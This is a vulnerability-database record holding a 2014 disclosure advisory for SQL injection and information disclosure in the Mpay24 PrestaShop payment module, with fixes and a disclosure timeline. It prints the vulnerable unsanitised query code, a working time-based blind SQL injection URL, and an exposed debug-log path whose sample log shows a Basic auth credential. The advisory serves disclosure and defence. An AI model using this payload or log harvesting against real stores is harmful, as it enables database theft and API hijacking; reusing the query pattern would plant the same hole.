{"result": {"zdt": [{"lastseen": "2016-04-19T23:40:25", "references": [], "description": "Mpay24 Payment Module versions 1.5 and below suffer from information disclosure and remote SQL injection vulnerabilities.", "edition": 1, "reporter": "Eldar Marcussen", "published": "2014-09-04T00:00:00", "type": "zdt", "title": "Mpay24 Payment Module 1.5 Information Disclosure / SQL Injection Mpay24 Payment Module 1.5 Informat", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2009", "CVE-2014-2008"], "modified": "2014-09-04T00:00:00", "href": "http://0day.today/exploit/description/22592", "id": "1337DAY-ID-22592", "sourceData": "Mpay24 PrestaShop Payment Module Multiple Vulnerabilities\r\n\r\n - \u00b7 Affected Vendor: Mpay24\r\n - \u00b7 Affected Software: Mpay24 Payment Module\r\n - \u00b7 Affected Version: 1.5 and earlier\r\n - \u00b7 Issue Type: SQL injection and information disclosure\r\n - \u00b7 Notification Date: 10 February 2014\r\n - \u00b7 Release Date: 03 September 2014\r\n - \u00b7 Discovered by: Eldar Marcussen\r\n - \u00b7 Issue status: Patch available\r\n\r\nSummary\r\n\r\nBAE Systems Applied Intelligence researcher, Eldar Marcussen has identified\r\ntwo high impact vulnerabilities in the Mpay24 payment module for the\r\nPrestashop e-commerce solution.\r\n\r\n\u201cMpay24 is the online-payment platform for e- and m-commerce combines\r\nfrequently used and innovative payment systems in one single interface\u201d. [\r\nwww.mpay24.com]\r\n\r\n\u201cPrestashop is the free ecommerce solution to start your online business\r\nand start selling online. Build an online store for free with Prestashop.\u201d [\r\nwww.prestashop.com]\r\nPre-Authentication Blind SQL Injection Requires\r\n\r\nMpay24 payment module present on the website.\r\nCVE identifier\r\n\r\nCVE-2014-2008\r\nDescription\r\n\r\nThe Mpay24 plugin version 1.5 and earlier does not sufficiently filter or\r\nescape user supplied data used in database queries resulting in SQL\r\ninjection vulnerabilities.\r\n\r\nThe following blind SQL injection vulnerability is caused by user supplied\r\ndata being used directly in a database query, as evidenced by the offending\r\ncode:\r\n\r\n confirm.php:12: Db::getInstance()->Execute(\"\r\n\r\nconfirm.php:13: UPDATE `\"._DB_PREFIX_.\"mpay24_order` SET\r\n\r\nconfirm.php:14: `MPAYTID` = \".$_REQUEST['MPAYTID'].\",\r\n\r\nconfirm.php:15: `STATUS` = '\".$_REQUEST['STATUS'].\"'\r\n\r\nconfirm.php:16: WHERE `TID` = '\".$_REQUEST['TID'].\"'\r\n\r\nconfirm.php:17: \");\r\nImpact\r\n\r\nUsing this vulnerability, BAE Systems was able to extract information\r\ndirectly from the database, bypassing any restrictions that may be enforced\r\nby the application.\r\n\r\n\r\n Proof of Concept\r\n\r\nThe following URL introduces an artificial delay in the page response time\r\nwhich can be used by an attacker to extract data from the database:\r\n\r\n\r\nhttp://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+\r\nRecommendation\r\n\r\nUse prepared statements to ensure the structure of the database query\r\nremains intact.\r\nPre-Authentication Information Disclosure Requires\r\n\r\nMpay24 configured with debug enabled (default value until version 1.6).\r\nCVE identifier\r\n\r\nCVE-2014-2009\r\nDescription\r\n\r\nThe Mpay24 plugin logs raw curl requests and other debugging information to\r\nthe payment gateway by default. This log file is publicly accessible and\r\ncontains information valuable to an attacker, including the base64 encoded\r\ncredentials used by the merchant to access the Mpay24 API.\r\nImpact\r\n\r\nUsing this vulnerability, BAE Systems was able to obtain Mpay24 API\r\ncredentials and the local path of the Prestashop installation. The attacker\r\ncan use the API credentials to hijack the merchants API access and leverage\r\nthe local path disclosure with other exploits.\r\nProof of Concept\r\n\r\nURL: http://target/path/modulesmapy24/api/curllog.log\r\n\r\n * About to connect() to test.mpay24.com port 443 (#0)\r\n\r\n* Trying 213.164.23.169...\r\n\r\n* connected\r\n\r\n* Connected to test.mpay24.com (213.164.23.169) port 443 (#0)\r\n\r\n* successfully set certificate verify locations:\r\n\r\n* CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem\r\n\r\n CApath: /etc/ssl/certs\r\n\r\n* SSL connection using DHE-RSA-AES256-GCM-SHA384\r\n\r\n* Server certificate:\r\n\r\n* subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH;\r\nOU=EuropeanSSL Single; CN=test.mpay24.com\r\n\r\n* start date: 2013-05-13 00:00:00 GMT\r\n\r\n* expire date: 2015-05-13 23:59:59 GMT\r\n\r\n* subjectAltName: test.mpay24.com matched\r\n\r\n* issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA\r\n\r\n* SSL certificate verify ok.\r\n\r\n* Server auth using Basic with user 'u91234'\r\n\r\n> POST /app/bin/etpproxy_v15 HTTP/1.1\r\n\r\nAuthorization: Basic dTkxMjM0OlNPQVAxMjM=\r\n\r\nUser-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$)\r\n\r\nHost: test.mpay24.com\r\n\r\nAccept: */*\r\n\r\nContent-Length: 423\r\n\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n\r\n\r\n* upload completely sent off: 423 out of 423 bytes\r\n\r\n* additional stuff not fine transfer.c:1037: 0 0\r\n\r\n* HTTP 1.1 or later with persistent connection, pipelining supported\r\n\r\n< HTTP/1.1 401 Authorization Required\r\n\r\n< Date: Sun, 09 Feb 2014 21:04:21 GMT\r\n\r\n< Server: Apache\r\n\r\n* Authentication problem. Ignoring this.\r\n\r\n< WWW-Authenticate: Basic realm=\"mPAY24 WebService\"\r\n\r\n< Content-Length: 401\r\n\r\n< Content-Type: text/html; charset=iso-8859-1\r\n\r\n<\r\n\r\n* Connection #0 to host test.mpay24.com left intact\r\n\r\n* Closing connection #0\r\nRecommendation\r\n\r\nRestrict access to webpages containing sensitive functionality or data to\r\nauthenticated users.\r\nEnd User Recommendation\r\n\r\nUpdate your Mpay24 plugin to version 1.6 or later.\r\nResponse Timeline\r\n\r\n - 10/02/2014 \u2013 Vendor notified\r\n - 13/02/2014 \u2013 Patch available through GitHub\r\n - 19/02/2014 \u2013 CVE identifiers assigned\r\n\r\n03/09/2014 \u2013 Advisory released\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "http://0day.today/exploit/22592", "hash": "e8cbfc2e225233c05d05b02751e7a9ff07e5b95a3164d4274e84153b583c6d81"}]}}